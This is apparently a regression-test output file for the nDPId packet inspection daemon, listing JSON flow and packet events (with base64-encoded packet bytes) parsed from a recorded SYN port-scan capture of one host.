+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAstv8AADQGXXOsEAAIQA2GNIzTAwndU4MZAAAAAGACBAAxgwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsbq4AADkGoMSsEAAIQA2GNIzTH5PdU4MZAAAAAGACCAAQ+QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAs2EwAACoGRiasEAAIQA2GNIzTCBTdU4MZAAAAAGACDAAkeAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsPR8AADoG0VOsEAAIQA2GNIzTBEbdU4MZAAAAAGACDAAoRgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsfjwAADAGmjasEAAIQA2GNIzTD83dU4MZAAAAAGACBAAkvwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAs8dMAADoGHJ+sEAAIQA2GNIzTI4vdU4MZAAAAAGACDAAJAQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsObwAAC8G37asEAAIQA2GNIzT3aLdU4MZAAAAAGACEABK6QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061007,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_packet_id":1,"flow_last_seen":1278275061007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061007,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHsAACkGdvesEAAIQA2GNIzTgAndU4MZAAAAAGACCACwggAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061008,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_packet_id":1,"flow_last_seen":1278275061008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061008,"pkt":"ACYLMQczACWzv5HuCABFAAAsLtsAADoG35esEAAIQA2GNIzTAxPdU4MZAAAAAGACDAApeQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsUJAAACUG0uKsEAAIQA2GNIzTI5fdU4MZAAAAAGACCAAM9QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsmLwAAC0GgrasEAAIQA2GNIzTAiDdU4MZAAAAAGACCAAubAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsaTkAADMGrDmsEAAIQA2GNIzTIL\/dU4MZAAAAAGACEAAHzQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/QMAADYGFW+sEAAIQA2GNIzSw1DdUoMYAAAAAGACDABpPgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsj3AAADkGgAKsEAAIQA2GNIzSF\/HdUoMYAAAAAGACCAAYngAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsPl0AADAG2hWsEAAIQA2GNIzSDRfdUoMYAAAAAGACBAAneAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAs24AAAC0GP\/KsEAAIQA2GNIzSzlbdUoMYAAAAAGACCABiOAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAs6Y8AACcGN+OsEAAIQA2GNIzSPpLdUoMYAAAAAGACEADp\/AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsLOEAACsG8JGsEAAIQA2GNIzSwA\/dUoMYAAAAAGACEABofwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsboUAADIGp+2sEAAIQA2GNIzSGoXdUoMYAAAAAGACDAASCgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsVxkAACcGylmsEAAIQA2GNIzSF3TdUoMYAAAAAGACEAARGwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsbJ8AADoGodOsEAAIQA2GNIzSBCHdUoMYAAAAAGACDAAobgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsE7MAACUGD8CsEAAIQA2GNIzSD0rdUoMYAAAAAGACCAAhRQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAszqgAACUGVMqsEAAIQA2GNIzS\/23dUoMYAAAAAGACCAAxIQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsjYwAACsGj+asEAAIQA2GNIzSGWbdUoMYAAAAAGACEAAPKQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAse1IAADMGmiCsEAAIQA2GNIzSQmHdUoMYAAAAAGACEADmLQAAAgQFtA=="} 